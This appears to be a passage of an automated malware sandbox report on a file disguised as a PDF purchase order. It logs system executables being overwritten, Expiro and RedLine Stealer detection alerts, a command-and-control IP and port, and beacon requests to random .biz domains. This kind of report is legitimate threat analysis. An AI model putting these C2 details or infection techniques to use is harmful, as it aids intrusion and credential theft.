                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452126
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,3_2_0045C999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,3_2_00436ADE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00434BEE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0045DD7C FindFirstFileW,FindClose,3_2_0045DD7C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD29
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,3_2_00436D2D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442E1F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_00475FE5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8D
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 05B4FCE7h7_2_05B4F588
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_05B4B128
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 05B4A455h7_2_05B4A434
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then inc dword ptr [ebp-20h]7_2_05B42478
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then jmp 05B4DE72h7_2_05B4DE5A
                            Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 4x nop then inc dword ptr [ebp-20h]7_2_05B421A8
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 01457394h8_2_01457188
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 014578DCh8_2_01457688
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h8_2_01457E60
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 014578DCh8_2_0145767A
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h8_2_01457E54

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:63907 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49707 -> 18.141.10.107:80
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49724
                            Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:63299 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49706 -> 212.162.149.53:2049
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49724
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49713
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
                            Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49706 -> 212.162.149.53:2049
                            Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:54745 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:2049 -> 192.168.2.5:49706
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49713
                            Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:64943 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:2049 -> 192.168.2.5:49706
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49929
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49929
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49942
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49942
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:49992
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:49992
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:49985
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:49985
                            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50022 -> 34.211.97.45:80
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:50022
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:50022
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.213.104.86:80 -> 192.168.2.5:51583
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.213.104.86:80 -> 192.168.2.5:51583
                            Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:53567 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:50017
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:50017
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:50057
                            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.5:50040
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.5:50040
                            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:50057
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 212.162.149.53:2049
                            Queries random domain names (often used to prevent blacklisting and sinkholes)
                            Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                            Source: unknownNetwork traffic detected: DNS query count 80
                            Source: global trafficTCP traffic: 192.168.2.5:49706 -> 212.162.149.53:2049
                            Source: global trafficTCP traffic: 192.168.2.5:49712 -> 51.195.88.199:587
                            Source: Joe Sandbox ViewIP Address: 165.160.15.20 165.160.15.20
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: global trafficTCP traffic: 192.168.2.5:49712 -> 51.195.88.199:587
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /rurmblummdysikl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /qmfuhtf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /mxhgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /agup HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /acnwjlbaxboknfa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /dwqgybxwikykky HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
